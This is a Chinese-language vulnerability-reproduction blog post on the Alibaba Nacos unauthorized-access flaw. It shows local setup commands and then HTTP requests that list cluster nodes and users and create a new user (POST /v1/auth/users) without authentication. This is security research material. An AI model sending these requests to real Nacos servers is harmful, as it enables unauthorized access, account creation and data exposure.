【漏洞复现】Nacos未授权访问

漏洞背景
2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。
漏洞复现
本地搭建
https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1

 wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz./startup.sh -m standalone

然后访问 http://ip:端口/nacos 即可,默认账号密码 nacos/nacos

前端访问一下地址试试是否存在未授权访问漏洞

http://xxx.xxx.xxx.xxx/v1/core/cluster/nodes?withInstances=false&pageNo=1&pageSize=10&keyword=

【漏洞复现】Nacos未授权访问_第1张图片
可以发现以及泄露了 ip节点 等数据 (证实是确实存在的)
我们试下访问用户列表

为什么是 /v1/auth/users ,而不是 /nacos/v1/auth/users

因为大部分企业都是 /v1/auth/users 这也就是为什么好多人没有复现成功的原因所在

v1/auth/users?pageNo=1&pageSize=9

可以看能够前端未授权访问用户列表

还可以发现对用户的请求是没有过滤的,完全可以通过未授权的情况获取用户的敏感信息
在这里插入图片描述
那么我们直接简化请求下尝试创建一个用户

POST /v1/auth/users?username=ttt&password=ttt

【漏洞复现】Nacos未授权访问_第2张图片

【漏洞复现】Nacos未授权访问_第3张图片
成功创建
【漏洞复现】Nacos未授权访问_第4张图片
尝试登录
【漏洞复现】Nacos未授权访问_第5张图片
成功登录

你可能感兴趣的:(漏洞复现,web,安全,漏洞复现,安全漏洞,渗透测试)